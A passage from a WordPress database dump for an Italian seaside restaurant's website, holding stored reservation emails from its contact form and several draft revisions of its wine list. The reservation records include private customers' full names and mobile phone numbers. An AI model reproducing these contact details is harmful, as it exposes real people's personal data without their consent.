conferma.\r\nGrazie \r\nClaudio Curti\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-11','','','2020-09-07 21:23:57','2020-09-07 19:23:57','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-11/',0,'postman_sent_mail','',0),(1076,0,'2020-09-07 21:23:58','2020-09-07 19:23:58','Da: Claudio \nTelefono: 3933317367\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno, \r\nVolevo prenotare per domenica 13 settembre alle ore 13,00 per n. 2 persone possibilmente all’esterno, avendo un cane.\r\nResto in attesa di una vostra conferma.\r\nGrazie \r\nClaudio Curti\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-12','','','2020-09-07 21:23:58','2020-09-07 19:23:58','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-12/',0,'postman_sent_mail','',0),(1077,0,'2020-09-08 18:37:04','2020-09-08 16:37:04','Da: Francesco \nTelefono: 3296428527\nOggetto: Prenotazione sabato 12 settembre\n\nCorpo del messaggio:\nBuonasera, \r\nVi scrivo perché vorrei prenotare un tavolo per 2 persone sabato 12 ore 21:00. Vorremmo festeggiare il nostro anniversario presso di voi.\r\n\r\n\r\n\r\nChiedo cortesemente la conferma della prenotazione.\r\n\r\nGrazie mille\r\nSaluti\r\nFB\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione sabato 12 settembre\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-sabato-12-settembre','','','2020-09-08 18:37:04','2020-09-08 16:37:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-sabato-12-settembre/',0,'postman_sent_mail','',0),(1078,0,'2020-09-09 23:58:05','2020-09-09 21:58:05','Da: Simone Scarponi \nTelefono: 3347676779\nOggetto: Prenotazione\n\nCorpo del messaggio:\nSalve, è possibile prenotare per questo sabato 12 settembre alle ore  21.00?\r\n\r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-13','','','2020-09-09 23:58:05','2020-09-09 21:58:05','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-13/',0,'postman_sent_mail','',0),(1079,0,'2020-09-10 19:09:53','2020-09-10 17:09:53','Da: Marchi pier paolo \nTelefono: 3477148463\nOggetto: Prenotazione per sabato sera 12 settembre\n\nCorpo del messaggio:\nCiao..chiedevo se e possibile prenotare per 2 persone a cena ,anche sul tardi) sabato  prossimo 12 settembre?..grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione per sabato sera 12 settembre\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-per-sabato-sera-12-settembre','','','2020-09-10 19:09:53','2020-09-10 17:09:53','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-per-sabato-sera-12-settembre/',0,'postman_sent_mail','',0),(1080,0,'2020-09-12 13:27:31','2020-09-12 11:27:31','Da: Sara Carminati <s>\nTelefono: 3339745677\nOggetto: Richiesta prenotazione per il 12/9 ore 21\n\nCorpo del messaggio:\nBuongiorno \r\nSarei interessata a prenotare un tavolo per questa sera ore 21 per 2 persone.\r\nGrazie per un vostro feedback.\r\nSara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Richiesta prenotazione per il 12/9 ore 21\"','','private','closed','closed','','da-sito-sol-y-mar-richiesta-prenotazione-per-il-12-9-ore-21','','','2020-09-12 13:27:31','2020-09-12 11:27:31','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-richiesta-prenotazione-per-il-12-9-ore-21/',0,'postman_sent_mail','',0),(1081,0,'2020-09-13 14:52:31','2020-09-13 12:52:31','Da: Windt \nTelefono: 0031622378496\nOggetto: prenotare\n\nCorpo del messaggio:\ne pessibile di prenotare per stasera verso le 8 per 4 persone?\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"prenotare\"','','private','closed','closed','','da-sito-sol-y-mar-prenotare','','','2020-09-13 14:52:31','2020-09-13 12:52:31','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotare/',0,'postman_sent_mail','',0),(1082,0,'2020-09-14 18:01:33','2020-09-14 16:01:33','Da: Marco Aluigi \nTelefono: 3355686245\nOggetto: prenotazione pranzo per sabato 19 settembre 2020\n\nCorpo del messaggio:\nBuonasera, Vorrei prenotare per 8 persone sabato 19 Settembre ore 13.00-13.10, all\'aperto, in spiaggia. Si tratta di un pranzo aziendale. Attendo gentile conferma. Grazie, Cordialmente, Marco Aluigi, Vicedirettore Fondazione Meeting per l\'amicizia fra i popoli\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"prenotazione pranzo per sabato 19 settembre 2020\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-pranzo-per-sabato-19-settembre-2020','','','2020-09-14 18:01:33','2020-09-14 16:01:33','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-pranzo-per-sabato-19-settembre-2020/',0,'postman_sent_mail','',0),(1083,0,'2020-09-16 21:59:08','2020-09-16 19:59:08','Da: Michele Zanni \nTelefono: 3391607762\nOggetto: Prenotazione per sabato 26\n\nCorpo del messaggio:\nBuonasera,\r\nvorrei prenotare un tavolo per 2 persone per sabato 26 settembre, alle ore 13.00, un tavolo esterno se possibile.\r\nGrazie mille,\r\nattendo conferma\r\nMichele Zanni\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione per sabato 26\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-per-sabato-26','','','2020-09-16 21:59:08','2020-09-16 19:59:08','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-per-sabato-26/',0,'postman_sent_mail','',0),(1084,0,'2020-09-18 17:05:55','2020-09-18 15:05:55','Da: Nicola Borelli \nTelefono: 3406224816\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno, vorrei prenotare un tavolo per 2 persone per domani sera sabato 19 settembre alle 21.00. Attendo cortese conferma\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-14','','','2020-09-18 17:05:55','2020-09-18 15:05:55','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-14/',0,'postman_sent_mail','',0),(1085,0,'2020-09-26 11:51:20','2020-09-26 09:51:20','Da: Barbara Brandoli \nTelefono: 3470597898\nOggetto: Chiusura estiva\n\nCorpo del messaggio:\nSalve, volevo sapere fino a quando siete aperti Per la stagione? \r\nGrazie.\r\nBarbara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Chiusura estiva\"','','private','closed','closed','','da-sito-sol-y-mar-chiusura-estiva','','','2020-09-26 11:51:20','2020-09-26 09:51:20','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-chiusura-estiva/',0,'postman_sent_mail','',0),(1087,2,'2020-09-26 20:24:31','2020-09-26 18:24:31','<u>            SOL Y MAR</u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\r\n<u> </u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><u>0,375</u></p>\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano              Aulente Bianco                                  € 9,00\r\n\r\nDonnafugata                    Anthilia I.G.T.                                  € 9,00\r\n\r\nUmani Ronchi             Verdicchio Casal Di Serra                  € 9,00\r\n\r\n&nbsp;\r\n\r\n<strong>       </strong>\r\n<p style=\"text-align: center\"><strong>Frizzanti</strong></p>\r\n<strong> </strong>\r\n\r\nAdami                              Prosecco D.O.C.                                 € 10,00\r\n\r\nIl Mosnel                          Franciacorta Brut D.O.C.G.            € 16,00\r\n\r\nLaherte Freres             Champagne Brut Tradition                € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Rossi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano           Aulente Rosso                                          € 9,00','I piccoli formati da 0.375','','inherit','closed','closed','','73-revision-v1','','','2020-09-26 20:24:31','2020-09-26 18:24:31','',73,'https://www.ristorantesolymar.it/2020/09/26/73-revision-v1/',0,'revision','',0),(1088,2,'2020-09-26 20:25:07','2020-09-26 18:25:07','<u>            SOL Y MAR</u>\r\n<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\r\n<p style=\"text-align: center\"></p>\r\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano              Aulente Bianco                                  € 9,00\r\n\r\nDonnafugata                    Anthilia I.G.T.                                  € 9,00\r\n\r\nUmani Ronchi             Verdicchio Casal Di Serra                  € 9,00\r\n\r\n&nbsp;\r\n\r\n<strong>       </strong>\r\n<p style=\"text-align: center\"><strong>Frizzanti</strong></p>\r\n<strong> </strong>\r\n\r\nAdami                              Prosecco D.O.C.                                 € 10,00\r\n\r\nIl Mosnel                          Franciacorta Brut D.O.C.G.            € 16,00\r\n\r\nLaherte Freres             Champagne Brut Tradition                € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Rossi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano           Aulente Rosso                                          € 9,00','I piccoli formati da 0.375','','inherit','closed','closed','','73-revision-v1','','','2020-09-26 20:25:07','2020-09-26 18:25:07','',73,'https://www.ristorantesolymar.it/2020/09/26/73-revision-v1/',0,'revision','',0),(1089,2,'2020-09-26 20:25:41','2020-09-26 18:25:41','<u>            SOL Y MAR</u>\r\n<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\r\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano              Aulente Bianco                                  € 9,00\r\n\r\nDonnafugata                    Anthilia I.G.T.                                  € 9,00\r\n\r\nUmani Ronchi             Verdicchio Casal Di Serra                  € 9,00\r\n\r\n&nbsp;\r\n\r\n<strong>       </strong>\r\n<p style=\"text-align: center\"><strong>Frizzanti</strong></p>\r\n<strong> </strong>\r\n\r\nAdami                              Prosecco D.O.C.                                 € 10,00\r\n\r\nIl Mosnel                          Franciacorta Brut D.O.C.G.            € 16,00\r\n\r\nLaherte Freres             Champagne Brut Tradition                € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Rossi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano           Aulente Rosso                                          € 9,00','I piccoli formati da 0.375','','inherit','closed','closed','','73-revision-v1','','','2020-09-26 20:25:41','2020-09-26 18:25:41','',73,'https://www.ristorantesolymar.it/2020/09/26/73-revision-v1/',0,'revision','',0),(1090,2,'2020-09-26 20:31:16','2020-09-26 18:31:16','<u>            SOL Y MAR</u><u></u>\r\n<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano           Aulente Bianco                                                                           € 9,00\r\n\r\nDonnafugata                Anthilia I.G.T.                                                                            € 10,00\r\n\r\nUmani Ronchi              Verdicchio Casal Di Serra                                                       € 10,00\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Bollicine</strong></p>\r\n<strong> </strong>\r\n\r\nAdami                             Prosecco D.O.C.                                                                         € 10,00\r\n\r\nLaherte Freres              Champagne Brut Ultradition      (assemblage)                    € 30,00\r\n\r\nBonnet Gilmert             Champagne BdB Cuvèe de riserve Brut GC                         € 28,00\r\n\r\nJean Vesselle                 Champagne Brut Rosè de Saignèe                                         € 30,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Rossi</strong>\r\n\r\n<strong> </strong>\r\n\r\nSan Patrignano                     Aulente Rosso    (NO)                                                       € 9,00','I piccoli formati da 0.375','','inherit','closed','closed','','73-revision-v1','','','2020-09-26 20:31:16','2020-09-26 18:31:16','',73,'https://www.ristorantesolymar.it/2020/09/26/73-revision-v1/',0,'revision','',0),(1091,2,'2020-09-26 20:40:59','2020-09-26 18:40:59','<p style=\"text-align: center\"><strong>   Vino della  \'\'casa\'\'</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi           Albiano Verdicchio Doc dei castelli di Jesi Bott. 0,750 l                 € 16,oo\r\n<p style=\"text-align: center\">    Vallona                       Pignoletto Frizzante D.O.C. Bott. 0,750 l                                            € 18,oo</p>\r\n<p style=\"text-align: center\">        <em><strong>      LE NOSTRE PROPOSTE AL BICCHIERE</strong></em></p>\r\n<p style=\"text-align: center\"><strong> </strong><strong>  BIANCHI</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi                       Albiano Verdicchio dei castelli di Jesi Doc 2018                   € 4,oo\r\n\r\nGirlan                                     Gewurztraminer   Trentino Alto Adige Doc                             € 6,oo\r\n\r\nDomaine Hamelin               Chablis 2018                                                                                   € 6,oo\r\n\r\nRonco dei Tassi                   Ribolla Gialla (cormons)                                                               € 6,oo\r\n\r\nMajolini                                 Saten millesimato D.o.c.g. (Franciacorta)                                € 8,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>ROSSI</strong></p>\r\n&nbsp;\r\n\r\nFico Grande Romagna Doc           Sangiovese Podere Nespoli                                             € 5,oo','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2020-09-26 20:40:59','2020-09-26 18:40:59','',106,'https://www.ristorantesolymar.it/2020/09/26/106-revision-v1/',0,'revision','',0),(1092,2,'2020-09-26 20:41:53','2020-09-26 18:41:53','<p style=\"text-align: center\"><strong>   Vino della  \'\'casa\'\'</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi           Albiano Verdicchio Doc dei castelli di Jesi Bott. 0,750 l                € 16,oo\r\n\r\nVallona                       Pignoletto Frizzante D.O.C. Bott. 0,750 l                                           € 18,oo\r\n<p style=\"text-align: center\">        <em><strong>      LE NOSTRE PROPOSTE AL BICCHIERE</strong></em></p>\r\n<p style=\"text-align: center\"><strong> </strong><strong>  BIANCHI</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi                       Albiano Verdicchio dei castelli di Jesi Doc 2018                   € 4,oo\r\n\r\nGirlan                                     Gewurztraminer   Trentino Alto Adige Doc                             € 6,oo\r\n\r\nDomaine Hamelin               Chablis 2018                                                                                   € 6,oo\r\n\r\nRonco dei Tassi                   Ribolla Gialla (cormons)                                                               € 6,oo\r\n\r\nMajolini                                 Saten millesimato D.o.c.g. (Franciacorta)                                € 8,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>ROSSI</strong></p>\r\n&nbsp;\r\n\r\nFico Grande Romagna Doc           Sangiovese Podere Nespoli                                             € 5,oo','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2020-09-26 20:41:53','2020-09-26 18:41:53','',106,'https://www.ristorantesolymar.it/2020/09/26/106-revision-v1/',0,'revision','',0),(1093,2,'2020-09-26 20:44:17','2020-09-26 18:44:17','<p style=\"text-align: center\">-</p>\r\n<p style=\"text-align: center\">-</p>\r\n<p style=\"text-align: center\">-</p>\r\n<p style=\"text-align: center\"><strong>Vino della  \'\'casa\'\'</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi           Albiano Verdicchio Doc dei castelli di Jesi Bott. 0,750 l                € 16,oo\r\n\r\nVallona                       Pignoletto Frizzante D.O.C. Bott. 0,750 l                                           € 18,oo\r\n<p style=\"text-align: center\">        <em><strong>      LE NOSTRE PROPOSTE AL BICCHIERE</strong></em></p>\r\n<p style=\"text-align: center\"><strong> </strong><strong>  BIANCHI</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi                       Albiano Verdicchio dei castelli di Jesi Doc 2018                   € 4,oo\r\n\r\nGirlan                                     Gewurztraminer   Trentino Alto Adige Doc                             € 6,oo\r\n\r\nDomaine Hamelin               Chablis 2018                                                                                   € 6,oo\r\n\r\nRonco dei Tassi                   Ribolla Gialla (cormons)                                                               € 6,oo\r\n\r\nMajolini                                 Saten millesimato D.o.c.g. (Franciacorta)                                € 8,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>ROSSI</strong></p>\r\n&nbsp;\r\n\r\nFico Grande Romagna Doc           Sangiovese Podere Nespoli                                             € 5,oo','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2020-09-26 20:44:17','2020-09-26 18:44:17','',106,'https://www.ristorantesolymar.it/2020/09/26/106-revision-v1/',0,'revision','',0),(1094,2,'2020-09-26 20:52:14','2020-09-26 18:52:14','<p></p>\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<p style=\"text-align: center\"></p>\r\n<p style=\"text-align: center\"><strong>Vino della  \'\'casa\'\'</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi           Albiano Verdicchio Doc dei castelli di Jesi Bott. 0,750 l                € 16,oo\r\n\r\nVallona                       Pignoletto Frizzante D.O.C. Bott. 0,750 l                                           € 18,oo\r\n<p style=\"text-align: center\">        <em><strong>      LE NOSTRE PROPOSTE AL BICCHIERE</strong></em></p>\r\n<p style=\"text-align: center\"><strong> </strong><strong>  BIANCHI</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi                       Albiano Verdicchio dei castelli di Jesi Doc 2018                   € 4,oo\r\n\r\nGirlan                                     Gewurztraminer   Trentino Alto Adige Doc                             € 6,oo\r\n\r\nDomaine Hamelin               Chablis 2018                                                                                   € 6,oo\r\n\r\nRonco dei Tassi                   Ribolla Gialla (cormons)                                                               € 6,oo\r\n\r\nMajolini                                 Saten millesimato D.o.c.g. (Franciacorta)                                € 8,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>ROSSI</strong></p>\r\n&nbsp;\r\n\r\nFico Grande Romagna Doc           Sangiovese Podere Nespoli                                             € 5,oo','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2020-09-26 20:52:14','2020-09-26 18:52:14','',106,'https://www.ristorantesolymar.it/2020/09/26/106-revision-v1/',0,'revision','',0),(1095,2,'2020-09-26 20:52:56','2020-09-26 18:52:56','<strong> </strong>\r\n<strong> </strong>\r\n<strong> </strong>\r\n<p style=\"text-align: center\"></p>\r\n<p style=\"text-align: center\"><strong>Vino della  \'\'casa\'\'</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi           Albiano Verdicchio Doc dei castelli di Jesi Bott. 0,750 l                € 16,oo\r\n\r\nVallona                       Pignoletto Frizzante D.O.C. Bott. 0,750 l                                           € 18,oo\r\n<p style=\"text-align: center\">        <em><strong>      LE NOSTRE PROPOSTE AL BICCHIERE</strong></em></p>\r\n<p style=\"text-align: center\"><strong> </strong><strong>  BIANCHI</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi                       Albiano Verdicchio dei castelli di Jesi Doc 2018                   € 4,oo\r\n\r\nGirlan                                     Gewurztraminer   Trentino Alto Adige Doc                             € 6,oo\r\n\r\nDomaine Hamelin               Chablis 2018                                                                                   € 6,oo\r\n\r\nRonco dei Tassi                   Ribolla Gialla (cormons)                                                               € 6,oo\r\n\r\nMajolini                                 Saten millesimato D.o.c.g. (Franciacorta)                                € 8,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>ROSSI</strong></p>\r\n&nbsp;\r\n\r\nFico Grande Romagna Doc           Sangiovese Podere Nespoli                                             € 5,oo','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2020-09-26 20:52:56','2020-09-26 18:52:56','',106,'https://www.ristorantesolymar.it/2020/09/26/106-revision-v1/',0,'revision','',0),(1096,2,'2020-09-26 20:54:06','2020-09-26 18:54:06','<strong></strong>\r\n<strong></strong>\r\n<strong></strong>\r\n<p style=\"text-align: center\"></p>\r\n<p style=\"text-align: center\"><strong>Vino della  \'\'casa\'\'</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi           Albiano Verdicchio Doc dei castelli di Jesi Bott. 0,750 l                € 16,oo\r\n\r\nVallona                       Pignoletto Frizzante D.O.C. Bott. 0,750 l                                           € 18,oo\r\n<p style=\"text-align: center\">        <em><strong>      LE NOSTRE PROPOSTE AL BICCHIERE</strong></em></p>\r\n<p style=\"text-align: center\"><strong> </strong><strong>  BIANCHI</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi                       Albiano Verdicchio dei castelli di Jesi Doc 2018                   € 4,oo\r\n\r\nGirlan                                     Gewurztraminer   Trentino Alto Adige Doc                             € 6,oo\r\n\r\nDomaine Hamelin               Chablis 2018                                                                                   € 6,oo\r\n\r\nRonco dei Tassi                   Ribolla Gialla (cormons)                                                               € 6,oo\r\n\r\nMajolini                                 Saten millesimato D.o.c.g. (Franciacorta)                                € 8,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>ROSSI</strong></p>\r\n&nbsp;\r\n\r\nFico Grande Romagna Doc           Sangiovese Podere Nespoli                                             € 5,oo','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2020-09-26 20:54:06','2020-09-26 18:54:06','',106,'https://www.ristorantesolymar.it/2020/09/26/106-revision-v1/',0,'revision','',0),(1097,2,'2020-09-26 20:59:17','2020-09-26 18:59:17','<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano           Aulente Bianco                                                                           € 9,00\r\n\r\nDonnafugata                Anthilia I.G.T.                                                                            € 10,00\r\n\r\nUmani Ronchi              Verdicchio Casal Di Serra                                                       € 10,00\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Bollicine</strong></p>\r\n<strong> </strong>\r\n\r\nAdami                             Prosecco D.O.C.                                                                         € 10,00\r\n\r\nLaherte Freres              Champagne Brut Ultradition      (assemblage)                    € 30,00\r\n\r\nBonnet Gilmert             Champagne BdB Cuvèe de riserve Brut GC                         € 28,00\r\n\r\nJean Vesselle                 Champagne Brut Rosè de Saignèe                                         € 30,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Rossi</strong>\r\n\r\n<strong> </strong>\r\n\r\nSan Patrignano                     Aulente Rosso    (NO)                                                       € 9,00','I piccoli formati da 0.375','','inherit','closed','closed','','73-revision-v1','','','2020-09-26 20:59:17','2020-09-26 18:59:17','',73,'https://www.ristorantesolymar.it/2020/09/26/73-revision-v1/',0,'revision','',0),(1098,2,'2020-09-26 21:09:37','2020-09-26 19:09:37','','Carta dei Vini','','inherit','closed','closed','','22-revision-v1','','','2020-09-26 21:09:37','2020-09-26 19:09:37','',22,'https://www.ristorantesolymar.it/2020/09/26/22-revision-v1/',0,'revision','',0),(1099,2,'2020-09-26 21:10:22','2020-09-26 19:10:22','[pagelist_ext child_of=\"current\" limit_content=\"200\"]','Carta dei Vini','','inherit','closed','closed','','22-revision-v1','','','2020-09-26 21:10:22','2020-09-26 19:10:22','',22,'https://www.ristorantesolymar.it/2020/09/26/22-revision-v1/',0,'revision','',0),(1100,2,'2020-10-24 23:03:54','2020-10-24 21:03:54','<p style=\"text-align: center\"><strong>BOLLICINE</strong></p>\n<strong><u> </u></strong>\n<p style=\"text-align: center\"><strong><u>Italia</u></strong></p>\n<strong><u> </u></strong>\n\n<strong><u>     Piemonte</u></strong>\n<p style=\"text-align: left\">  Ettore Germano                    Alta Langa brut D.O.C.                                                                 € 30</p>\n<p style=\"text-align: left\">   Coppo                                    Luigi Coppo Brut                                                                            € 30</p>\n&nbsp;\n\n<strong><u>   Lombardia</u></strong><u></u>\n\nCantine Montagna             Pinot nero v.i.b. Oltrepò Pavese D.O.C.                                       € 18\n\n&nbsp;\n\n<strong><u>   Trentino - Alto Adige</u></strong>\n\nRevì                                       Trento D.O.C. Dosaggio Zero                                                       € 32\n\nLetrari (Talento)                   Trento D.O.C. Brut                                                                       € 28\n\nTrento D.O.C. dosaggio zero                                                       € 35\n\nFerrari                                      Perlè Trento D.O.C Brut                                                               € 45\n\nCantina Furlani                      Furlani Brut                                                                                    € 22\n\nCantina Furlani                      Furlani Brut Nature                                                                      € 22\n\n<strong><u> </u></strong>\n\n<strong><u>   Veneto</u></strong><u></u>\n\nCampofalco Biologico             Prosecco Valdobbiadene D.OC.G                                                            € 19\n\nAdami                                         Prosecco Valdob. D.O.C.G. Brut Bosco di Giga                                     € 20\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;','Le mille e una bollicina','','inherit','closed','closed','','75-autosave-v1','','','2020-10-24 23:03:54','2020-10-24 21:03:54','',75,'https://www.ristorantesolymar.it/2020/09/26/75-autosave-v1/',0,'revision','',0),(1101,2,'2020-09-26 21:29:56','2020-09-26 19:29:56','<p style=\"text-align: center\">BOLLICINE  ITALIA</p>\r\n<p style=\"text-align: center\"><em><strong><u> Piemonte</u></strong></em></p>\r\n<p style=\"text-align: left\">     Ettore Germano                  Alta Langa brut D.O.C.                                                                                € 30</p>\r\n<p style=\"text-align: left\">     Coppo                                   Luigi Coppo Brut                                                                                            €30</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><em><strong><u>Lombardia</u></strong></em></p>\r\n<p style=\"text-align: left\">    Cantine Montagna               Pinot nero v.i.b. Oltrepò Pavese D.O.C.                                                    € 18</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong><u>Trentino - Alto Adige</u></strong></p>\r\n<p style=\"text-align: left\">    Revì                                         Trento D.O.C. Dosaggio Zero                                                                    € 32</p>\r\n<p style=\"text-align: left\">    Letrari (Talento)                   Trento D.O.C. Brut                                                                                      € 28</p>\r\n<p style=\"text-align: left\">                                                      Trento D.O.C. dosaggio zero                                                                     € 35</p>\r\n<p style=\"text-align: left\">    Ferrari                                     Perlè Trento D.O.C Brut                                                                             € 45</p>\r\n<p style=\"text-align: left\">    Cantina Furlani                     Furlani Brut                                                                                                  € 22</p>\r\n<p style=\"text-align: left\">    Cantina Furlani                     Furlani Brut Nature                                                                                     € 22</p>\r\n&nbsp;\r\n<p style=\"text-align: center\">   <strong><u>Veneto</u></strong></p>\r\n<p style=\"text-align: center\"></p>\r\n<p style=\"text-align: left\">    Campofalco Biologico          Prosecco Valdobbiadene D.OC.G                                                          € 19</p>\r\n<p style=\"text-align: left\">    Adami                                      Prosecco Valdob. D.O.C.G. Brut Bosco di Giga                                 €20</p>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Le mille e una bollicina','','inherit','closed','closed','','75-revision-v1','','','2020-09-26 21:29:56','2020-09-26 19:29:56','',75,'https://www.ristorantesolymar.it/2020/09/26/75-revision-v1/',0,'revision','',0),(1102,2,'2020-09-26 21:30:13','2020-09-26 19:30:13','<p style=\"text-align: center\">BOLLICINE  ITALIA</p>\r\n<p style=\"text-align: center\"><em><strong><u> Piemonte</u></strong></em></p>\r\n<p style=\"text-align: left\">     Ettore Germano                  Alta Langa brut D.O.C.                                                                                € 30</p>\r\n<p style=\"text-align: left\">     Coppo                                   Luigi Coppo Brut                                                                                            €30</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><em><strong><u>Lombardia</u></strong></em></p>\r\n<p style=\"text-align: left\">    Cantine Montagna               Pinot nero v.i.b. Oltrepò Pavese D.O.C.                                                    € 18</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><em><strong><u>Trentino - Alto Adige</u></strong></em></p>\r\n<p style=\"text-align: left\">    Revì                                         Trento D.O.C. Dosaggio Zero                                                                    € 32</p>\r\n<p style=\"text-align: left\">    Letrari (Talento)                   Trento D.O.C. Brut                                                                                      € 28</p>\r\n<p style=\"text-align: left\">                                                      Trento D.O.C. dosaggio zero                                                                     € 35</p>\r\n<p style=\"text-align: left\">    Ferrari                                     Perlè Trento D.O.C Brut                                                                             € 45</p>\r\n<p style=\"text-align: left\">    Cantina Furlani                     Furlani Brut                                                                                                  € 22</p>\r\n<p style=\"text-align: left\">    Cantina Furlani                     Furlani Brut Nature                                                                                     € 22</p>\r\n&nbsp;\r\n<p 